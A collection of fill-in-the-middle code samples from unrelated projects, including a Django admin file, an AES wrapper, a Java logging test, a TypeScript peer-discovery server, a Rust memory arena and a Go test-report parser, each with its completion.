<|file_name|>admin.py<|end_file_name|><|fim▁begin|>from django.contrib import admin from .models import * class ProductAdmin(admin.ModelAdmin): list_display = ('id', 'prd_process_id', 'prd_name', 'prd_display_name', 'prd_owner', 'prd_product_id', 'prd_date', 'prd_class', 'prd_filter', 'prd_is_public', 'prd_is_permanent',) list_display_links = ('id', 'prd_process_id', 'prd_name',) search_fields = ('prd_process_id', 'prd_name', 'prd_display_name', 'prd_product_id',) class ProductReleaseAdmin(admin.ModelAdmin): list_display = ('id', 'product', 'release',) list_display_links = ('id', 'product', 'release',) search_fields = ('product', 'release',) class ProductTagAdmin(admin.ModelAdmin): list_display = ('id', 'product', 'tag',) list_display_links = ('id', 'product', 'tag',) search_fields = ('product', 'tag',) class FileAdmin(admin.ModelAdmin): list_display = ('id', 'prd_name', 'prd_display_name', 'prd_class', 'fli_base_path', 'fli_name',) list_display_links = ('id', 'prd_name', 'prd_display_name', 'prd_class',) search_fields = ('fli_name',) class TableAdmin(admin.ModelAdmin): list_display = ('id', 'prd_name', 'prd_display_name', 'prd_class', 'tbl_database', 'tbl_schema', 'tbl_name',) list_display_links = ('id', 'prd_name', 'prd_display_name', 'prd_class', 'tbl_schema', 'tbl_name',) search_fields = ('tbl_schema', 'tbl_name',) class CatalogAdmin(admin.ModelAdmin): list_display = ( 'id', 'prd_name', 'prd_display_name', 'prd_class', 'ctl_num_objects', ) class MapAdmin(admin.ModelAdmin): list_display = ( 'id', 'prd_name', 'prd_display_name', 'prd_class', 'mpa_nside', 'mpa_ordering', 'prd_filter', 'prd_is_public', 'prd_is_permanent' ) list_display_links = ('id', 'prd_name') search_fields = ('prd_name',) class CutOutJobAdmin(admin.ModelAdmin): list_display = ( 'id', 'cjb_product', 'cjb_display_name', 'cjb_status', 'cjb_tag', 'owner', ) list_display_links = ('id',) search_fields = ('cjb_display_name',) <|fim▁hole|> class DesjobAdmin(admin.ModelAdmin): list_display = ( 'id', 'djb_cutout_job', 'djb_jobid', 'djb_status', 'djb_start_time', 'djb_finish_time', 'djb_message', ) list_display_links = ('id',) search_fields = ('djb_jobid',) class CutoutAdmin(admin.ModelAdmin): list_display = ( 'id', 'cjb_cutout_job', 'ctt_object_id', 'ctt_object_ra', 'ctt_object_dec', 'ctt_img_format', 'ctt_filter', 'ctt_file_name', 'ctt_file_path', 'ctt_file_type', 'ctt_file_size', ) list_display_links = ('id',) search_fields = ('id',) class MaskAdmin(admin.ModelAdmin): list_display = ( 'id', 'prd_name', 'prd_display_name', 'prd_class', 'msk_filter', ) list_display_links = ('id', 'prd_name') search_fields = ('prd_name',) class ProductContentAdmin(admin.ModelAdmin): list_display = ('id', 'pcn_product_id', 'pcn_column_name', 'pcn_ucd') list_display_links = ('pcn_column_name',) search_fields = ('pcn_column_name',) class ProductContentAssociationAdmin(admin.ModelAdmin): list_display = ('id', 'pca_product', 'pca_class_content', 'pca_product_content',) search_fields = ('pca_product__prd_display_name', 'pca_product__prd_name') class ProductContentSettingAdmin(admin.ModelAdmin): list_display = ('id', 'pcs_content', 'pcs_setting', 'pcs_is_visible', 'pcs_order') class ProductSettingAdmin(admin.ModelAdmin): list_display = ( 'id', 'cst_product', 'owner', 'cst_display_name', 'cst_description', 'cst_is_public', 'cst_is_editable',) search_fields = ('cst_product__prd_display_name', 'cst_display_name', 'cst_description',) class CurrentSettingAdmin(admin.ModelAdmin): list_display = ('id', 'cst_product', 'cst_setting', 'owner',) class 
WorkgroupAdmin(admin.ModelAdmin): list_display = ('id', 'wgp_workgroup', 'owner',) class WorkgroupUserAdmin(admin.ModelAdmin): list_display = ('id', 'wgu_workgroup', 'wgu_user',) class PermissionAdmin(admin.ModelAdmin): list_display = ('id', 'prm_product', 'prm_user', 'prm_workgroup',) class ProductRelatedAdmin(admin.ModelAdmin): list_display = ('id', 'prl_product', 'prl_related', 'prl_relation_type', 'prl_cross_identification',) class FiltersetdAdmin(admin.ModelAdmin): list_display = ('id', 'product', 'owner', 'fst_name',) class FilterConditionAdmin(admin.ModelAdmin): list_display = ('id', 'filterset', 'fcd_property', 'fcd_property_name', 'fcd_operation', 'fcd_value') class BookmarkedAdmin(admin.ModelAdmin): list_display = ('id', 'product', 'owner', 'is_starred') admin.site.register(Product, ProductAdmin) admin.site.register(ProductRelease, ProductReleaseAdmin) admin.site.register(ProductTag, ProductTagAdmin) admin.site.register(File, FileAdmin) admin.site.register(Table, TableAdmin) admin.site.register(Catalog, CatalogAdmin) admin.site.register(Map, MapAdmin) admin.site.register(CutOutJob, CutOutJobAdmin) admin.site.register(Desjob, DesjobAdmin) admin.site.register(Cutout, CutoutAdmin) admin.site.register(Mask, MaskAdmin) admin.site.register(ProductContent, ProductContentAdmin) admin.site.register(ProductContentAssociation, ProductContentAssociationAdmin) admin.site.register(ProductContentSetting, ProductContentSettingAdmin) admin.site.register(ProductSetting, ProductSettingAdmin) admin.site.register(CurrentSetting, CurrentSettingAdmin) admin.site.register(Permission, PermissionAdmin) admin.site.register(ProductRelated, ProductRelatedAdmin) admin.site.register(Workgroup, WorkgroupAdmin) admin.site.register(WorkgroupUser, WorkgroupUserAdmin) admin.site.register(Filterset, FiltersetdAdmin) admin.site.register(FilterCondition, FilterConditionAdmin) admin.site.register(BookmarkProduct, BookmarkedAdmin)<|fim▁end|>
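The admin.py row registers each ModelAdmin with explicit admin.site.register calls at the bottom; Django also offers the equivalent @admin.register decorator form. A sketch of one registration rewritten that way (the Product import follows the sample's relative `.models` import):

```python
from django.contrib import admin
from .models import Product  # as in the sample

@admin.register(Product)  # equivalent to admin.site.register(Product, ProductAdmin)
class ProductAdmin(admin.ModelAdmin):
    list_display = ('id', 'prd_name', 'prd_display_name')
    search_fields = ('prd_name',)
```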
<|file_name|>pycrypto_aes.py<|end_file_name|><|fim▁begin|># Author: Trevor Perrin # See the LICENSE file for legal information regarding use of this file. """PyCrypto AES implementation.""" from .cryptomath import * from .aes import * if pycryptoLoaded: import Crypto.Cipher.AES def new(key, mode, IV): return PyCrypto_AES(key, mode, IV) class PyCrypto_AES(AES): def __init__(self, key, mode, IV): AES.__init__(self, key, mode, IV, "pycrypto") key = bytes(key) IV = bytes(IV) self.context = Crypto.Cipher.AES.new(key, mode, IV) def encrypt(self, plaintext): <|fim▁hole|> def decrypt(self, ciphertext): ciphertext = bytes(ciphertext) return bytearray(self.context.decrypt(ciphertext))<|fim▁end|>
plaintext = bytes(plaintext) return bytearray(self.context.encrypt(plaintext))
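A round-trip sketch for the wrapper above, assuming PyCrypto is installed and the module's relative imports resolve; AES-CBC wants a 16/24/32-byte key, a 16-byte IV, and block-aligned plaintext:

```python
from Crypto.Cipher import AES as _AES  # only for the MODE_CBC constant

key = bytearray(16)                  # demo key; never use an all-zero key in practice
iv = bytearray(16)
msg = bytearray(b'sixteen byte msg')  # exactly one AES block

ct = new(key, _AES.MODE_CBC, iv).encrypt(msg)  # 'new' as defined in this module
pt = new(key, _AES.MODE_CBC, iv).decrypt(ct)
assert pt == msg
```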
<|file_name|>GemfireVerboseMarkerFilterAcceptIntegrationTest.java<|end_file_name|><|fim▁begin|>/* * Licensed to the Apache Software Foundation (ASF) under one or more contributor license * agreements. See the NOTICE file distributed with this work for additional information regarding * copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance with the License. You may obtain a * copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express * or implied. See the License for the specific language governing permissions and limitations under * the License. */ package org.apache.geode.internal.logging.log4j; import static org.apache.geode.test.util.ResourceUtils.createFileFromResource; import static org.apache.geode.test.util.ResourceUtils.getResource; import static org.assertj.core.api.Assertions.assertThat; <|fim▁hole|>import org.apache.logging.log4j.Level; import org.apache.logging.log4j.Logger; import org.apache.logging.log4j.core.LogEvent; import org.apache.logging.log4j.junit.LoggerContextRule; import org.apache.logging.log4j.test.appender.ListAppender; import org.junit.Before; import org.junit.BeforeClass; import org.junit.ClassRule; import org.junit.Rule; import org.junit.Test; import org.junit.experimental.categories.Category; import org.junit.rules.TemporaryFolder; import org.apache.geode.internal.logging.LogService; import org.apache.geode.test.junit.categories.LoggingTest; @Category(LoggingTest.class) public class GemfireVerboseMarkerFilterAcceptIntegrationTest { private static final String APPENDER_NAME = "LIST"; private static String configFilePath; private Logger logger; private String logMessage; private ListAppender listAppender; @ClassRule public static TemporaryFolder temporaryFolder = new TemporaryFolder(); @Rule public LoggerContextRule loggerContextRule = new LoggerContextRule(configFilePath); @BeforeClass public static void setUpLogConfigFile() throws Exception { String configFileName = GemfireVerboseMarkerFilterAcceptIntegrationTest.class.getSimpleName() + "_log4j2.xml"; URL resource = getResource(configFileName); configFilePath = createFileFromResource(resource, temporaryFolder.getRoot(), configFileName) .getAbsolutePath(); } @Before public void setUp() throws Exception { logger = LogService.getLogger(); logMessage = "this is a log statement"; assertThat(LogService.isUsingGemFireDefaultConfig()).as(LogService.getConfigurationInfo()) .isFalse(); listAppender = loggerContextRule.getListAppender(APPENDER_NAME); } @Test public void gemfireVerboseShouldLogIfGemfireVerboseIsAccept() { logger.info(LogMarker.GEMFIRE_VERBOSE, logMessage); LogEvent logEvent = listAppender.getEvents().get(0); assertThat(logEvent.getLoggerName()).isEqualTo(logger.getName()); assertThat(logEvent.getLevel()).isEqualTo(Level.INFO); assertThat(logEvent.getMessage().getFormattedMessage()).isEqualTo(logMessage); } @Test public void geodeVerboseShouldLogIfGemfireVerboseIsAccept() { logger.info(LogMarker.GEODE_VERBOSE, logMessage); LogEvent logEvent = listAppender.getEvents().get(0); assertThat(logEvent.getLoggerName()).isEqualTo(logger.getName()); assertThat(logEvent.getLevel()).isEqualTo(Level.INFO); assertThat(logEvent.getMessage().getFormattedMessage()).isEqualTo(logMessage); } }<|fim▁end|>
import java.net.URL;
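The test pins down accept semantics: with GEMFIRE_VERBOSE accepted, statements marked GEMFIRE_VERBOSE or GEODE_VERBOSE must both reach the appender. A rough Python logging analogue of a marker filter, for intuition only (Log4j's marker hierarchy is richer than this flat set):

```python
import logging

class MarkerFilter(logging.Filter):
    def __init__(self, accepted):
        super().__init__()
        self.accepted = set(accepted)

    def filter(self, record):
        # accept only records tagged with an allowed marker
        return getattr(record, 'marker', None) in self.accepted

handler = logging.StreamHandler()
handler.addFilter(MarkerFilter({'GEMFIRE_VERBOSE', 'GEODE_VERBOSE'}))
logger = logging.getLogger('geode')
logger.addHandler(handler)
logger.warning('verbose message', extra={'marker': 'GEODE_VERBOSE'})  # passes
logger.warning('other message', extra={'marker': 'OTHER'})            # filtered out
```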
<|file_name|>nls.py<|end_file_name|><|fim▁begin|>#! /usr/bin/env python # -*- coding: utf-8 -*- # Copyright (C) 2011 ~ 2012 Deepin, Inc. # 2011 ~ 2012 Hou Shaohui # # Author: Hou Shaohui <[email protected]> # Maintainer: Hou Shaohui <[email protected]> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import gettext import os def get_parent_dir(filepath, level=1): '''Get parent dir.''' parent_dir = os.path.realpath(filepath) while(level > 0): parent_dir = os.path.dirname(parent_dir)<|fim▁hole|> return parent_dir LOCALE_DIR=os.path.join(get_parent_dir(__file__, 2), "locale") if not os.path.exists(LOCALE_DIR): LOCALE_DIR="/usr/share/locale" _ = None try: _ = gettext.translation("deepin-music-player", LOCALE_DIR).gettext except Exception, e: _ = lambda i : i<|fim▁end|>
level -= 1
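The completion `level -= 1` is what makes the loop in get_parent_dir terminate: each iteration strips one path component. The same walk, written as a plain loop over os.path.dirname:

```python
import os.path

path = os.path.realpath('/usr/share/locale/en/LC_MESSAGES')
level = 2
while level > 0:
    path = os.path.dirname(path)
    level -= 1
assert path.endswith(os.path.join('usr', 'share', 'locale'))
```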
<|file_name|>server.ts<|end_file_name|><|fim▁begin|>const restify = require('restify'); const random = require('random-js')(); const Promise = require("bluebird"); // import * as restify from 'restify'; const assert = require('assert'); const clients = require('restify-clients'); const CBuffer = require('CBuffer'); const fs = require('fs-extra'); const defaultPeerUpPort = 56633; const defaultMaxPeerServices = 100; const defaultServiceInterval = 8000; const myServicesFilename:string = "./my-services.json"; const peerServicesFilename:string = "./peer-services.json"; const seedUrl:string = "http://45.32.186.169:"+defaultPeerUpPort; const postPeerUpKey:string = "peer-up-url"; export class Server { constructor(config={ peerUpPort:defaultPeerUpPort, maxPeerServices:defaultMaxPeerServices, serviceInterval:defaultServiceInterval }) { this.peerUpPort=config.peerUpPort || defaultPeerUpPort; this.maxPeerServices=config.maxPeerServices || defaultMaxPeerServices; this.serviceInterval=config.serviceInterval || defaultServiceInterval; this.server = restify.createServer({ name: 'peer-up', version: '1.0.0' }); this.server.use(restify.plugins.acceptParser(this.server.acceptable)); this.server.use(restify.plugins.queryParser()); this.server.use(restify.plugins.bodyParser()); this.server.post('/peer-up', (req, res, next)=>{this.onPost(req, res, next)}); if(!fs.existsSync(myServicesFilename)) { console.log("please create file with your services '"+myServicesFilename+"' like example file!"); process.exit(-1); } this.myServices = JSON.parse(fs.readFileSync(myServicesFilename)); this.peerServices = CBuffer(this.maxPeerServices); this.readRemoteServicesFromFile(); this.getMyIp().then(()=>{ if(!this.amISeed()) { this.addPeerService({"name":"peer-up","version":"1.0.0","url":seedUrl}); this.onTimeToCheckForServices(); } }).catch((err)=>{ console.log(err); process.exit(-1); }); } amISeed():boolean { return (seedUrl.indexOf(this.myIp)!=-1); } serviceInterval; maxPeerServices; peerUpPort; myServices; peerServices; server; myIp:string; listen() { this.server.listen(this.peerUpPort, ()=>{ console.log('%s listening at %s', this.server.name, this.server.url); }); this.installServiceInterval(); } onPost(req, res, next) { // let remote = req.headers['x-forwarded-for'] || req.connection.remoteAddress; //console.log("from ip "+req.connection.remoteAddress); //console.log("received post:\n"+JSON.stringify(req.params)); if(req.params[postPeerUpKey]) { this.addPeerUpFromIncomingPost(req.params[postPeerUpKey]); } const selection = this.createSelectionByName(req.params); Server.pushRandomly(selection, req.params); res.send(req.params); return next(); }; static pushRandomly(selection, params) { let max = params.max ? 
params.max : 1; params.services = []; for(let i=0; i<max; i++) { let index=random.integer(0,selection.length-1); params.services.push(selection[index]); } } createSelectionByName(params):any { let selection = []; this.myServices.services.forEach(function(entry) { if(params.service && entry.name != params.service) return; selection.push(entry); }); this.peerServices.forEach(function(entry){ if(params.service && entry.name != params.service) return; selection.push(entry); }); return selection; } addPeerUpFromIncomingPost(peerUpUrl:string) { let remotePeerUp = { name:'peer-up', version:'1.0.0', url:peerUpUrl }; if(this.isKnownPeerService(remotePeerUp)) return; this.addPeerService(remotePeerUp); this.writePeerServiceToFile(); } writePeerServiceToFile() { fs.writeFileSync(peerServicesFilename, JSON.stringify(this.peerServices.toArray())); } readRemoteServicesFromFile() { if(!fs.existsSync(remoteServicesFilename)) return; const remotes = JSON.parse(fs.readFileSync(remoteServicesFilename)); remotes.forEach((entry)=>{ this.peerServices.push(entry); }); } installServiceInterval() { setInterval(()=>{this.onTimeToCheckForServices()}, this.serviceInterval); } onTimeToCheckForServices() { let peers = []; this.peerServices.forEach((entry)=>{ if(entry.name!="peer-up") return; peers.push(entry); });<|fim▁hole|> if(peers.length==0) return; const selected = peers.length==1 ? 0 : random.integer(0,peers.length-1); this.checkPeerUpService(peers[selected].url); } checkPeerUpService(peerUrl:string) { const client = clients.createJsonClient({ url: peerUrl, version: '~1.0' }); try { client.post('/peer-up', {max:'3',[postPeerUpKey]:this.getMyPeerUpUrl()}, (err, req, res, obj)=> { if(!obj) return; if(!obj.services) return; //console.log("peer server <"+peerUrl+"> returned obj: %j", obj); if(obj.services.constructor !== Array) return; if(obj.services.length==0) return; obj.services.forEach((entry)=>{ this.addPeerService(entry); }); this.writePeerServiceToFile(); }); }catch(error) { console.log("peer:"+peerUrl); console.log(""+error); } } getMyPeerUpUrl():string { return "http://"+this.myIp+":"+this.peerUpPort; } addPeerService(service) { if(service.url.indexOf("127.0.0.1")!=-1) return; if(service.url.indexOf("localhost")!=-1) return; if(service.url.length==0) return; if(service.name.length==0) return; if((service.name!=="peer-up") && this.amISeed()) return; if(this.isMyService(service)) return; if(this.isKnownPeerService(service)) return; this.peerServices.push(service); //console.log("added new peer service: "+JSON.stringify(service)); } isKnownPeerService(service):boolean { let found=false; this.peerServices.forEach(function(entry) { if(service.url!==entry.url) return; if(service.name!==entry.name) return; //todo: version check found=true; }); return found; } isMyService(service):boolean { if(service.url===this.getMyPeerUpUrl()) return true; let found=false; this.myServices.services.forEach(function(entry){ if(service.url!==entry.url) return; if(service.name!==entry.name) return; //todo: version check found=true; }); return found; } getMyIp():Promise<any> { return new Promise((resolve, reject)=>{ const ipfyClient = clients.createJsonClient({url: 'https://api.ipify.org?format=json'}); ipfyClient.get('', (err, req, res, obj) => { if(err) { reject(err); } console.log('ipfy: %j', obj); this.myIp = obj.ip; resolve(); }); }); } } const remoteServicesFilename:string = "remote-services.json";<|fim▁end|>
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- # # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.<|fim▁hole|><|fim▁end|>
# See the License for the specific language governing permissions and # limitations under the License.
<|file_name|>memory_arena.rs<|end_file_name|><|fim▁begin|>//! 32-bit memory arena for types implementing `Copy`.
//! This memory arena has been implemented to fit the use of tantivy's indexer
//! and has *twisted specifications*.
//!
//! - It works on stable rust.
//! - One can get an accurate figure of the memory usage of the arena.
//! - Allocations are very cheap.
//! - Allocations happening consecutively are very likely to have great locality.
//! - Addresses (`Addr`) are 32 bits.
//! - Dropping the whole `MemoryArena` is cheap.
//!
//! # Limitations
//!
//! - Your object shall not implement `Drop`.
//! - `Addr` values into the arena are 32 bits. The maximum capacity of the arena
//!   is 4GB. *(Tantivy's indexer uses one arena per indexing thread.)*
//! - The arena only works for objects much smaller than `1MB`.
//!   Allocating more than `1MB` at a time will result in a panic,
//!   and allocating a lot of large objects (> 500KB) will result in fragmentation.
//! - Your objects are stored in an unaligned fashion. For this reason,
//!   the API does not let you access them as references.
//!
//!   Instead, you store and access your data via `.write(...)` and `.read(...)`, which under the hood
//!   rely on `ptr::write_unaligned` and `ptr::read_unaligned`.
use std::mem;
use std::ptr;

const NUM_BITS_PAGE_ADDR: usize = 20;
const PAGE_SIZE: usize = 1 << NUM_BITS_PAGE_ADDR; // pages are 1 MB large

/// Represents a pointer into the `MemoryArena`.
///
/// Pointers are 32 bits and are split into
/// two parts.
///
/// The first 12 bits represent the id of a
/// page of memory.
///
/// The last 20 bits are an address within this page of memory.
#[derive(Copy, Clone, Debug)]
pub struct Addr(u32);

impl Addr {
    /// Creates a null pointer.
    pub fn null_pointer() -> Addr {
        Addr(u32::max_value())
    }

    /// Returns the `Addr` object for `addr + offset`<|fim▁hole|>    pub fn offset(self, offset: u32) -> Addr {
        Addr(self.0.wrapping_add(offset))
    }

    fn new(page_id: usize, local_addr: usize) -> Addr {
        Addr((page_id << NUM_BITS_PAGE_ADDR | local_addr) as u32)
    }

    fn page_id(self) -> usize {
        (self.0 as usize) >> NUM_BITS_PAGE_ADDR
    }

    fn page_local_addr(self) -> usize {
        (self.0 as usize) & (PAGE_SIZE - 1)
    }

    /// Returns true if and only if the `Addr` is null.
    pub fn is_null(self) -> bool {
        self.0 == u32::max_value()
    }
}

pub fn store<Item: Copy + 'static>(dest: &mut [u8], val: Item) {
    assert_eq!(dest.len(), std::mem::size_of::<Item>());
    unsafe {
        ptr::write_unaligned(dest.as_mut_ptr() as *mut Item, val);
    }
}

pub fn load<Item: Copy + 'static>(data: &[u8]) -> Item {
    assert_eq!(data.len(), std::mem::size_of::<Item>());
    unsafe { ptr::read_unaligned(data.as_ptr() as *const Item) }
}

/// The `MemoryArena`
pub struct MemoryArena {
    pages: Vec<Page>,
}

impl MemoryArena {
    /// Creates a new memory arena.
    pub fn new() -> MemoryArena {
        let first_page = Page::new(0);
        MemoryArena {
            pages: vec![first_page],
        }
    }

    fn add_page(&mut self) -> &mut Page {
        let new_page_id = self.pages.len();
        self.pages.push(Page::new(new_page_id));
        &mut self.pages[new_page_id]
    }

    /// Returns an estimate in number of bytes
    /// of resident memory consumed by the `MemoryArena`.
    ///
    /// Internally, it counts a number of `1MB` pages
    /// and therefore delivers an upper bound.
    pub fn mem_usage(&self) -> usize {
        self.pages.len() * PAGE_SIZE
    }

    pub fn write_at<Item: Copy + 'static>(&mut self, addr: Addr, val: Item) {
        let dest = self.slice_mut(addr, std::mem::size_of::<Item>());
        store(dest, val);
    }

    /// Read an item in the heap at the given `address`.
    ///
    /// # Panics
    ///
    /// If the address is invalid
    pub fn read<Item: Copy + 'static>(&self, addr: Addr) -> Item {
        load(self.slice(addr, mem::size_of::<Item>()))
    }

    pub fn slice(&self, addr: Addr, len: usize) -> &[u8] {
        self.pages[addr.page_id()].slice(addr.page_local_addr(), len)
    }

    pub fn slice_from(&self, addr: Addr) -> &[u8] {
        self.pages[addr.page_id()].slice_from(addr.page_local_addr())
    }

    #[inline(always)]
    pub fn slice_mut(&mut self, addr: Addr, len: usize) -> &mut [u8] {
        self.pages[addr.page_id()].slice_mut(addr.page_local_addr(), len)
    }

    /// Allocates `len` bytes and returns the allocated address.
    pub fn allocate_space(&mut self, len: usize) -> Addr {
        let page_id = self.pages.len() - 1;
        if let Some(addr) = self.pages[page_id].allocate_space(len) {
            return addr;
        }
        self.add_page().allocate_space(len).unwrap()
    }
}

struct Page {
    page_id: usize,
    len: usize,
    data: Box<[u8]>,
}

impl Page {
    fn new(page_id: usize) -> Page {
        Page {
            page_id,
            len: 0,
            data: vec![0u8; PAGE_SIZE].into_boxed_slice(),
        }
    }

    #[inline(always)]
    fn is_available(&self, len: usize) -> bool {
        len + self.len <= PAGE_SIZE
    }

    fn slice(&self, local_addr: usize, len: usize) -> &[u8] {
        &self.slice_from(local_addr)[..len]
    }

    fn slice_from(&self, local_addr: usize) -> &[u8] {
        &self.data[local_addr..]
    }

    fn slice_mut(&mut self, local_addr: usize, len: usize) -> &mut [u8] {
        &mut self.data[local_addr..][..len]
    }

    fn allocate_space(&mut self, len: usize) -> Option<Addr> {
        if self.is_available(len) {
            let addr = Addr::new(self.page_id, self.len);
            self.len += len;
            Some(addr)
        } else {
            None
        }
    }
}

#[cfg(test)]
mod tests {

    use super::MemoryArena;

    #[test]
    fn test_arena_allocate_slice() {
        let mut arena = MemoryArena::new();
        let a = b"hello";
        let b = b"happy tax payer";

        let addr_a = arena.allocate_space(a.len());
        arena.slice_mut(addr_a, a.len()).copy_from_slice(a);

        let addr_b = arena.allocate_space(b.len());
        arena.slice_mut(addr_b, b.len()).copy_from_slice(b);

        assert_eq!(arena.slice(addr_a, a.len()), a);
        assert_eq!(arena.slice(addr_b, b.len()), b);
    }

    #[derive(Clone, Copy, Debug, Eq, PartialEq)]
    struct MyTest {
        pub a: usize,
        pub b: u8,
        pub c: u32,
    }

    #[test]
    fn test_store_object() {
        let mut arena = MemoryArena::new();
        let a = MyTest {
            a: 143,
            b: 21,
            c: 32,
        };
        let b = MyTest {
            a: 113,
            b: 221,
            c: 12,
        };

        let num_bytes = std::mem::size_of::<MyTest>();
        let addr_a = arena.allocate_space(num_bytes);
        arena.write_at(addr_a, a);

        let addr_b = arena.allocate_space(num_bytes);
        arena.write_at(addr_b, b);

        assert_eq!(arena.read::<MyTest>(addr_a), a);
        assert_eq!(arena.read::<MyTest>(addr_b), b);
    }
}<|fim▁end|>
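The 12/20-bit split documented on `Addr` can be checked in isolation. The following standalone sketch copies the two constants from the module and replays the packing arithmetic of `Addr::new`, `page_id`, and `page_local_addr`; it is a separate illustration, not part of the file above.

// addr_layout.rs: standalone check of the Addr bit layout (illustrative sketch).
const NUM_BITS_PAGE_ADDR: usize = 20;
const PAGE_SIZE: usize = 1 << NUM_BITS_PAGE_ADDR; // 1 MB pages

fn main() {
    let page_id: usize = 3;          // must fit in the upper 12 bits
    let local_addr: usize = 0xABCDE; // must fit in the lower 20 bits

    // Pack exactly as Addr::new does.
    let addr = (page_id << NUM_BITS_PAGE_ADDR | local_addr) as u32;

    // Unpack exactly as page_id() and page_local_addr() do.
    assert_eq!((addr as usize) >> NUM_BITS_PAGE_ADDR, page_id);
    assert_eq!((addr as usize) & (PAGE_SIZE - 1), local_addr);

    println!("addr = {:#010x}", addr);
}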
<|file_name|>test_task_exceptions.py<|end_file_name|><|fim▁begin|>from unittest import TestCase
from PyProjManCore.task import Task


class TestTaskOperationsExceptions(TestCase):
    """Test exceptions for Task operations"""

    def test_append_duplicate_prereq(self):
        """Test that appending a duplicate prerequisite to a task keeps the prerequisites unique"""
        root = Task("Root Task")
        parent = Task("Parent Task")
        root.append_prerequisite(parent)
        root.append_prerequisite(parent)
        self.assertNotEqual(2, len(root.prerequisites))

    def test_cyclic_dependency(self):
        """
        Test the case of a cyclic dependency, i.e. a task that depends on itself,
        or a task that has the same task as both prerequisite and child
        """
        self.fail("Not implemented")

    def test_append_duplicate_dep(self):
        """Test that appending a duplicate dependant to a task keeps the dependants unique"""
        root = Task("Root Task")
        child = Task("Child Task")
        root.append_dependant(child)
        root.append_dependant(child)<|fim▁hole|><|fim▁end|>
self.assertNotEqual(2, len(root.dependants))
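The cyclic-dependency test above is still a stub. A minimal sketch of the kind of check it could perform is shown below; it relies only on the `dependants` list used by the other tests, and the `has_cycle` helper is hypothetical, not part of PyProjManCore.

# Hypothetical helper (not part of PyProjManCore): depth-first walk over
# task.dependants, returning True if any path revisits a task already on it.
def has_cycle(task, path=None):
    path = path or set()
    if id(task) in path:
        return True
    for child in task.dependants:
        if has_cycle(child, path | {id(task)}):
            return True
    return False

# A future test body might then build a deliberate cycle and assert on it:
#     root = Task("Root Task")
#     child = Task("Child Task")
#     root.append_dependant(child)
#     child.append_dependant(root)  # a cycle, if Task does not guard against it
#     self.assertTrue(has_cycle(root))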
<|file_name|>style.ts<|end_file_name|><|fim▁begin|>import styled, { css } from 'styled-components'; import { ITheme } from '~/interfaces'; export const EmptySection = styled.div` margin-top: 16px; padding: 8px 0px 8px 0px; overflow: hidden; border-radius: 8px; <|fim▁hole|> ${({ theme }: { theme?: ITheme }) => css` background-color: ${theme['pages.lightForeground'] ? 'rgba(255, 255, 255, 0.05)' : '#fafafa'}; `}; `; export const SectionTitle = styled.div` font-size: 16px; padding: 16px 24px; font-weight: 500; `;<|fim▁end|>
&:first-child { margin-top: 0; }
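For context on how these two exports might be consumed, here is a small illustrative sketch; the React component, the component name, and the theme wiring are assumptions, not part of the record.

// Hypothetical usage of the styled components above (illustrative only).
import * as React from 'react';
import { ThemeProvider } from 'styled-components';
import { EmptySection, SectionTitle } from './style';

// A theme supplying the 'pages.lightForeground' flag read by EmptySection.
const theme = { 'pages.lightForeground': false };

export const HistoryPlaceholder = () => (
  <ThemeProvider theme={theme}>
    <EmptySection>
      <SectionTitle>No items yet</SectionTitle>
    </EmptySection>
  </ThemeProvider>
);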
<|file_name|>summary.go<|end_file_name|><|fim▁begin|>package lib

import (
	"io"
	"io/ioutil"
	"strings"

	"github.com/improbable-io/go-junit-report/parser"
)

type Results map[string][]*Test

const (
	PASS = "pass"
	FAIL = "fail"
	SKIP = "skip"
)

var jsonTestKeys = map[parser.Result]string{
	parser.PASS: PASS,
	parser.FAIL: FAIL,
	parser.SKIP: SKIP,
}

type Test struct {
	PackageName string `json:"package_name"`
	TestName    string `json:"test_name"`
	Time        int    `json:"time"`
	Output      string `json:"output"`
}

type TestSummary struct {
	TotalTests  int     `json:"total_tests"`
	BuildErrors string  `json:"build_errors"`
	Results     Results `json:"results"`
}

func Parse(stdoutReader io.Reader, stderrReader io.Reader) (*TestSummary, error) {
	results := Results{
		PASS: []*Test{},
		FAIL: []*Test{},
		SKIP: []*Test{},
	}

	res, err := parser.Parse(stdoutReader, "")
	if err != nil {
		return nil, err
	}

	totalTests := 0
	for _, pkg := range res.Packages {
		for _, t := range pkg.Tests {
			key := jsonTestKeys[t.Result]
<|fim▁hole|>				TestName:    t.Name,
				Time:        t.Time,
				Output:      strings.Join(t.Output, "\n"),
			}
			results[key] = append(results[key], jsonTest)
			totalTests++
		}
	}

	buildErrorBytes, err := ioutil.ReadAll(stderrReader)
	if err != nil {
		return nil, err
	}

	summary := &TestSummary{
		TotalTests:  totalTests,
		Results:     results,
		BuildErrors: string(buildErrorBytes),
	}

	return summary, nil
}<|fim▁end|>
jsonTest := &Test{ PackageName: pkg.Name,
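A caller of Parse might look roughly like the sketch below; the module import path is hypothetical, and the canned `go test -v` output stands in for a real command's stdout.

// main.go: illustrative caller for Parse (import path is a made-up placeholder).
package main

import (
	"fmt"
	"strings"

	"github.com/example/project/lib" // hypothetical module path
)

func main() {
	// Canned `go test -v` output; a real caller would stream the command's pipes here.
	stdout := strings.NewReader(`=== RUN   TestExample
--- PASS: TestExample (0.01s)
PASS
ok  	example.com/pkg	0.012s
`)
	stderr := strings.NewReader("") // no build errors in this sketch

	summary, err := lib.Parse(stdout, stderr)
	if err != nil {
		panic(err)
	}

	fmt.Printf("total tests: %d, passed: %d\n",
		summary.TotalTests, len(summary.Results[lib.PASS]))
}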